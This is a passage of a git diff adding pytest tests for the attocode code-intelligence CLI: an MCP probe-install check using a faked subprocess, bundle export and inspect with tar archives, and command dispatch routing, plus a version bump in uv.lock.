test_probe_install_explicit_project_uses_cwd_and_project_summary_for_user_scope( + self, + tmp_path: Path, + monkeypatch: pytest.MonkeyPatch, + capsys: pytest.CaptureFixture[str], + ): + from attocode.code_intel.installer import install_codex + from attocode.code_intel.probe import probe_install + + monkeypatch.setattr("attocode.code_intel.installer._find_command", lambda _project_dir=None: "uv run attocode-code-intel") + monkeypatch.setattr("pathlib.Path.home", lambda: tmp_path) + install_codex(project_dir=".", scope="user") + + observed: dict[str, object] = {"requests": []} + + class _FakeStdIn: + def __init__(self): + self.messages: list[str] = [] + + def write(self, data: bytes) -> None: + text = data.decode("utf-8") + self.messages.append(text) + payload = json.loads(text) + if "method" in payload: + observed["requests"].append(payload["method"]) + + async def drain(self) -> None: + return None + + def close(self) -> None: + return None + + class _FakeStdOut: + def __init__(self, responses: list[dict[str, object]]): + self._lines = [json.dumps(item).encode("utf-8") + b"\n" for item in responses] + + async def readline(self) -> bytes: + return self._lines.pop(0) if self._lines else b"" + + class _FakeProcess: + def __init__(self, responses: list[dict[str, object]]): + self.stdin = _FakeStdIn() + self.stdout = _FakeStdOut(responses) + self.stderr = _FakeStdOut([]) + + def terminate(self) -> None: + return None + + def kill(self) -> None: + return None + + async def wait(self) -> int: + return 0 + + async def _fake_create_subprocess_exec(command, *args, stdin=None, stdout=None, stderr=None, env=None, cwd=None): + observed["command"] = command + observed["args"] = list(args) + observed["cwd"] = cwd + observed["env"] = dict(env or {}) + return _FakeProcess([ + {"jsonrpc": "2.0", "id": 1, "result": {"protocolVersion": "2024-11-05"}}, + {"jsonrpc": "2.0", "id": 2, "result": {"tools": [{"name": "project_summary", "description": "summary", "inputSchema": {}}]}}, + {"jsonrpc": "2.0", "id": 3, "result": {"content": [{"type": "text", "text": "ok"}]}}, + ]) + + monkeypatch.setattr( + "attocode.integrations.mcp.client.asyncio.create_subprocess_exec", + _fake_create_subprocess_exec, + ) + + target_project = tmp_path / "target-project" + target_project.mkdir() + exit_code = probe_install( + "codex", + project_dir=str(target_project), + scope="user", + force_project_probe=True, + ) + captured = capsys.readouterr() + + assert exit_code == 0 + assert "with project_summary probe" in captured.out + assert observed["cwd"] == str(target_project) + assert observed["requests"] == [ + "initialize", + "notifications/initialized", + "tools/list", + "tools/call", + ] + + def test_bundle_inspect_missing_file_exits_cleanly( + self, + tmp_path: Path, + capsys: pytest.CaptureFixture[str], + ): + from attocode.code_intel.cli import dispatch_code_intel + + with pytest.raises(SystemExit) as exc_info: + dispatch_code_intel(["bundle", "inspect", str(tmp_path / "missing.tar.gz")]) + captured = capsys.readouterr() + + assert exc_info.value.code == 1 + assert "could not inspect bundle" in captured.err + + def test_bundle_inspect_non_tar_file_exits_cleanly( + self, + tmp_path: Path, + capsys: pytest.CaptureFixture[str], + ): + from attocode.code_intel.cli import dispatch_code_intel + + bad_bundle = tmp_path / "not-a-tar.tar.gz" + bad_bundle.write_text("nope", encoding="utf-8") + + with pytest.raises(SystemExit) as exc_info: + dispatch_code_intel(["bundle", "inspect", str(bad_bundle)]) + captured = capsys.readouterr() + + assert exc_info.value.code == 1 + assert "could not inspect bundle" in captured.err + + def test_bundle_inspect_missing_metadata_exits_cleanly( + self, + tmp_path: Path, + capsys: pytest.CaptureFixture[str], + ): + from attocode.code_intel.cli import dispatch_code_intel + + bundle_path = tmp_path / "missing-metadata.tar.gz" + payload_dir = tmp_path / "payload" + payload_dir.mkdir() + (payload_dir / "dummy.txt").write_text("x", encoding="utf-8") + with tarfile.open(bundle_path, "w:gz") as archive: + archive.add(payload_dir, arcname="attocode-bundle") + + with pytest.raises(SystemExit) as exc_info: + dispatch_code_intel(["bundle", "inspect", str(bundle_path)]) + captured = capsys.readouterr() + + assert exc_info.value.code == 1 + assert "could not inspect bundle" in captured.err + + def test_bundle_export_and_inspect( + self, + tmp_path: Path, + capsys: pytest.CaptureFixture[str], + ): + from attocode.code_intel.cli import dispatch_code_intel + + (tmp_path / ".attocode" / "index").mkdir(parents=True) + (tmp_path / ".attocode" / "index" / "symbols.db").write_text("symbols") + (tmp_path / ".attocode" / "cache").mkdir(parents=True) + (tmp_path / ".attocode" / "cache" / "memory.db").write_text("memory") + + bundle_path = tmp_path / "bundle.tar.gz" + dispatch_code_intel(["bundle", "export", "--project", str(tmp_path), "--output", str(bundle_path)]) + captured = capsys.readouterr() + assert "Bundle exported" in captured.out + assert bundle_path.exists() + + with tarfile.open(bundle_path, "r:gz") as archive: + names = set(archive.getnames()) + assert "attocode-bundle/metadata.json" in names + assert "attocode-bundle/artifacts/index/symbols.db" in names + assert "attocode-bundle/artifacts/cache/memory.db" in names + assert "attocode-bundle/artifacts/vectors/embeddings.db" not in names + metadata = json.loads( + archive.extractfile("attocode-bundle/metadata.json").read().decode("utf-8") + ) + assert metadata["schema_version"] == 1 + assert metadata["project_name"] == tmp_path.name + manifest = {item["path"]: item for item in metadata["artifacts"]} + assert manifest["artifacts/index/symbols.db"]["present"] is True + assert manifest["artifacts/vectors/embeddings.db"]["present"] is False + + dispatch_code_intel(["bundle", "inspect", str(bundle_path)]) + captured = capsys.readouterr() + assert "Schema version: 1" in captured.out + assert "artifacts/index/symbols.db: present" in captured.out + + # --------------------------------------------------------------------------- # CLI dispatch # --------------------------------------------------------------------------- @@ -2008,6 +2345,8 @@ def test_dispatch_help(self, capsys: pytest.CaptureFixture[str]): assert "install" in captured.out assert "uninstall" in captured.out assert "serve" in captured.out + assert "probe-install" in captured.out + assert "bundle export" in captured.out def test_dispatch_status( self, capsys: pytest.CaptureFixture[str], monkeypatch: pytest.MonkeyPatch, @@ -2034,6 +2373,67 @@ def test_status_shows_all_targets( "Claude Desktop", "Cline", "Zed"]: assert target_name in captured.out, f"Missing '{target_name}' in status output" + def test_dispatch_probe_install_routes( + self, + monkeypatch: pytest.MonkeyPatch, + capsys: pytest.CaptureFixture[str], + ): + from attocode.code_intel.cli import dispatch_code_intel + + observed: dict[str, str] = {} + + def _fake_probe_install( + target: str, + project_dir: str = ".", + scope: str = "local", + *, + force_project_probe: bool = False, + ) -> int: + observed["target"] = target + observed["project_dir"] = project_dir + observed["scope"] = scope + observed["force_project_probe"] = force_project_probe + print("probe ok") + return 0 + + monkeypatch.setattr("attocode.code_intel.probe.probe_install", _fake_probe_install) + + dispatch_code_intel(["probe-install", "cursor", "--project", "/tmp/demo", "--global"]) + captured = capsys.readouterr() + assert "probe ok" in captured.out + assert observed == { + "target": "cursor", + "project_dir": "/tmp/demo", + "scope": "user", + "force_project_probe": True, + } + + def test_dispatch_probe_install_unsupported_target_exits_2( + self, + capsys: pytest.CaptureFixture[str], + ): + from attocode.code_intel.cli import dispatch_code_intel + + with pytest.raises(SystemExit) as exc_info: + dispatch_code_intel(["probe-install", "claude"]) + captured = capsys.readouterr() + + assert exc_info.value.code == 2 + assert "file-based targets in v1" in captured.err + + def test_dispatch_probe_install_manual_target_exits_2( + self, + capsys: pytest.CaptureFixture[str], + ): + from attocode.code_intel.cli import dispatch_code_intel + + with pytest.raises(SystemExit) as exc_info: + dispatch_code_intel(["probe-install", "intellij"]) + captured = capsys.readouterr() + + assert exc_info.value.code == 2 + assert "manual-only" in captured.err + class TestVerifyCLI: def test_verify_local_index_layout(self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, capsys: pytest.CaptureFixture[str]): diff --git a/uv.lock b/uv.lock index 177b4349..f2684fa8 100644 --- a/uv.lock +++ b/uv.lock @@ -130,7 +130,7 @@ wheels = [ [[package]] name = "attocode" -version = "0.2.15" +version = "0.2.16" source = { editable = "." } dependencies = [ { name = "aiosqlite" },